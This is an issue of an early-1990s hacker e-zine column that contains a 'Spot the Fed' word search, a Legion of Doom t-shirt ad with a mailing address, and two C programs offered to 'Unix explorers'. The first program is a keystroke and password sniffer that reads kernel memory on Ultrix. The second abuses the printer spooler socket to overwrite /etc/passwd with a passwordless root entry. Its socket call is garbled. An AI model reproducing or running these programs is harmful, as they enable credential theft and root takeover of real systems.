/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
-/- -/-
/-/ *> TID-BYTES <* /-/
-/- -/-
/-/ by the Informatik Staff /-/
-/- -/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
Tid-Bytes is a standing column of miscellaneous bits of information.
This issue brings us a wordhunt, more info on those LOD t-shirts, and some
C-programs that I am sure will be of use to you Unix explorers.
"Spot the Fed!"
-by the staff-
Hiding out below are all sorts of undesirables. Search behind every two-way
mirror, potted plant, and light fixture (as well as diagonally, backwards, and
forwards) to locate them and the other terms listed below. [Thanks to KL, TK,
Vodka, Holistic, and everyone else...]
Wordlist
~~~~~~~
Klupfel - Henry Klupfel, Bellcore
Ames - Toni Ames, our buddy at Sprint
Maxfield - John Maxfield, in charge of several sting operations
Meola - Ralph Meola, AT&T
Foley - Tim Foley, Secret Service
Delaney - Donald Delaney, New York State Police, senior investigator
Clifford - Cliff Stoll, the cukoo, easy to spot, look for the hair
Geraldo - Geraldo Rivera, some sort of alien plague
Dale - Dale Drew, Tymnet Security
Thackeray - Gail Thackeray, Arizona prosecuter
Cook - William Cook, (ex)US prosecutor
Parker - Don Parker, security consultant
CERT - The Computer Emergency Response Team
Patrick - Patrick Farmer, Visionary, High-level informant
BellCore - bringing us new technology to explore
Sprint - Always tough
ATANDT - AT&T, quality you can depend on
confiscation - the game the feds are playing when they take your stereo away
RedBox - discount payphone device
informer - a narc, not a real popular buddy
phreak - a telecom enthusiast
probation - What you hope you get
jailtime - What you hope NOT to get
sting - a setup, the reason you don't leave your real info
raid - a friendly wakeup call
busted - gone down in history
arrest - you get to ride in a police car!
fraud - just a white lie
hacker - the root of all evil
warrant - "Warrant? We don't need no stinking warrants..."
magnum - popular device used to hold dangerous hackers at bay
police - do I smell bacon?
agents - friendly guys that don't know anything but have nice sunglasses
feds - big brother's helpers
officers - they protect and serve
SunDevil - The infamous operation Sun-Devil
Zardoz - CERT advisory compilations
cracker - politically correct term for hacker
___________________________________
| |
| Spot The Fed! |
| |
+---------------------------------+
| |
| t t m a g e n t s b a t y w m |
| r d d i e s m a g n u m n a e |
| s c d n r g n i t s d s e t o |
| p a e r a k n y n r d a t s l |
| r n l l l t e d a s e e p e a |
| i o a r d l a l r j a k f r d |
| n i n f o r m e r a d p c r r |
| t t e f e e c i a i u e o a s |
| h a y c o i r f w l r f d s h |
| a b o u f f a x k t f k u o p |
| c o n f i s c a t i o n a h a |
| k r o d e r k m l m d c r o y |
| e p o l i c e c r e i e f d r |
| r p a r k e r b v z a r d o z |
| a d a p a t r i c k r m c r c |
| y c i b e l l c o r e d b o x |
| |
+---------------------------------+
---------------------
LOD Shirts
by Erik Bloodaxe
With all the amazing hullabaloo going on in several newsgroups and throughout
the electronic community as a whole, I have decided to go ahead and make one
more, FINAL, print run on the LOD t-shirts.
Please, if anyone is interested, have your mail sent by the end of July, so
everyone who wants one can get one this time. I thought that in the 6 print
orders I made previously "Everyone" who wanted one got one, but from the
requests I have received apparently not.
I was amazed at the orders that came in from locations such as Hong Kong,
England, Netherlands and Australia. The list of luminaries who came out of the
woodwork with an interest in such item was equally as impressive, security
types at LLNL, government employees, hackers from the golden days, and even a
certain regular contributor to a few "not for normal distribution" mail lists.
This run is for those of you who got left out. Again, I urge that you respond
before July 31, as that is when it the opportunity ends forever.
Blatant promotion follows:
"LEGION OF DOOM--INTERNET WORLD TOUR" T-SHIRTS!
Now you too can own an official Legion of Doom T-shirt. This is the same shirt
that sold-out rapidly at the "Cyberview" hackers conference in St. Louis.
Join the other proud owners such as Lotus founder Mitch Kapor and award-winning
author Bruce Sterling by adding this collector's item to your wardrobe. This
professionally made, 100 percent cotton shirt is printed on both front and
back. The front displays "Legion of Doom Internet World Tour" as well as a
sword and telephone intersecting the planet earth, skull-and-crossbones style.
The back displays the words "Hacking for Jesus" as well as a substantial list
of "tour-stops" (internet sites) and a quote from Aleister Crowley. This
T-shirt is sold only as a novelty item, and is in no way attempting to glorify
computer crime.
Shirts are only $15.00, postage included! Overseas add an additional $5.00.
Send check or money-order (No CODs, cash or credit cards--evenrd) made payable
to Chris Goggans to:
Chris Goggans
5620 Glenmont #P-17
Houston, TX 77081
---------------------
Unix C-goodies
from cdmorgan
For you *nix explorers out there, here's a couple of interesting programs for
you to look at. They are untested, so have at it!
PROG1:
/* when run from a shell-escape in /bin/mail, this program is able to
read any password given to su, telnet, rsh by any user.
Works on Ultrix 4.0-4.2 with no mods */
#include <stdio.h>
#include <machine/pte.h>
#include <sys/param.h>
#include <sys/dir.h>
#include <sys/user.h>
#include <sys/proc.h>
#include <sys/conf.h>
#include <sys/tty.h>
#include <nlist.h>
#include <pwd.h>
static int kmem = -1, mem = -1 ;
struct nlist nlst[] = { { "_pt_tty" }, { NULL } } ;
init() {
kmem = open("/dev/kmem",0) ;
mem = open("/dev/mem", 0) ;
}
void getkval(unsigned long offset, int *ptr, int size)
{
lseek(kmem, (long)offset, 0) ;
read(kmem, (char *)ptr, size) ;
}
main()
{
int tty, ntty=9, i, j, k, bytes, oleng=0 ;
struct tty *tbase, *tt ;
char ptr[4096], old[4096] ;
init() ;
(void) nlist("/vmunix", nlst) ;
getkval(nlst[0].n_value, (int*)(&tty), sizeof(tty)) ;
tbase = (struct tty*)malloc(bytes=ntty*sizeof(struct tty)) ;
for (;;) {
getkval(nlst[0].n_value, (int*)tbase, ntty*sizeof(struct tty)) ;
for (j=0,tt=tbase;j<ntty;j++,tt++) {
if (tt->t_rawq.c_cc) {
getkval((unsigned long)tt->t_rawq.c_cf,(int*)ptr,tt->t_rawq.c_cc);
if ((oleng>tt->t_rawq.c_cc)&&
(!strncmp(old,ptr,tt->t_rawq.c_cc))) {
for(k=0;k<(oleng-tt->t_rawq.c_cc);k++)
putchar(0x10) ;
printf("\"") ;
}
else if (strncmp(old,ptr,oleng)||(oleng==0)) {
printf("\n%5d (%1d) \"",tt->t_pgrp,i) ;
for(i=0;i<tt->t_rawq.c_cc;i++)
printf("%c",((ptr[i]<32) ? '.' : ptr[i])) ;
printf("\"") ;
}
else if (strncmp(old,ptr,tt->t_rawq.c_cc)) {
putchar(8) ;
for(i=oleng;i<tt->t_rawq.c_cc;i++)
printf("%c",((ptr[i]<32) ? '.' : ptr[i])) ;
printf("\"") ;
}
strncpy(old,ptr,oleng=tt->t_rawq.c_cc) ;
fflush(stdout) ;
}
}
}
}
PROG2:
/* This will overlay /etc/password with a string that emulates
a root account with no password. the first strlen(replacement-string)
bytes will be overlayed */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <stdio.h>
struct sockaddr_un from = { AF_UNIX, "/dev/printer" };
char bufload[1024];
char buf[1024];
main(argc, argv)
char **argv;
{
int fromfile, loadlen, count, s;
unsigned char c;
/* load up buffer with passwordless root account */
sprintf(bufload, "root::0:1:Operating with no password:/:/bin/csh\nnobody:*:-2:-2:No Body:/:\n");
loadlen=strlen(bufload);
STREAM, 0)) < 0) {
fprintf(stderr, "Error openning socket.\n");
exit(1);
}
if(connect(s, &from, strlen(from.sun_path) + 2) < 0) {
fprintf(stderr, "Error connecting socket.\n");
exit(1);
}
/* lp must be a valid printer destination */ write(s, "\2lp\n", 4);
read(s, &c, 1);
if(c) {
fprintf(stderr, "Error %d on queuejob.\n", c);
exit(1);
}
/* give alternitive spooling file */
sprintf(buf, "\3%ld /etc/passwd\n", loadlen);
write(s, buf, strlen(buf));
read(s, &c, 1);
if(c) {
fprintf(stderr, "Error %d on /etc/passwd creation.\n", c);
exit(1);
}
/* write out new root password entry */
write(s, bufload, loadlen);
write(s, "", 1);
read(s, &c, 1);
if(c) {
fprintf(stderr, "Error %d after overwrite.\n", c);
exit(1);
}
/* bogus data file entry */
sprintf(buf, "\3%ld %s\n", 10L, "dfA000xxxxxxxxx");
write(s, buf, strlen(buf));
read(s, &c, 1);
if(c) {
fprintf(stderr, "Error %d on df file\n", c);
exit(1);
}
write(s, "xxxxxxxxxx", 10);
write(s, "", 1);
read(s, &c, 1);
if(c) {
fprintf(stderr, "Error %d at last overwrite.\n", c);
exit(1);
}
exit(0);
}
Back to the master Table of Contents.